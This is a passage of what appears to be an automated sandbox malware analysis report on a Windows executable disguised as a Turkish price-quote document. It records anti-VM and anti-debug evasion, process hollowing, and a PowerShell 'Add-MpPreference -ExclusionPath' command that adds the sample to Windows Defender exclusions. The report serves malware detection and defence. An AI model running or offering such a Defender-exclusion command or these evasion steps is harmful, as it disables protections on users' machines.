                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 57F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 67F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: EDD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: FDD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 10260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 11260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5667Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4049Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe TID: 7496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.12.drBinary or memory string: VMware
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                      Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1630488283.0000000001736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMemory written: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
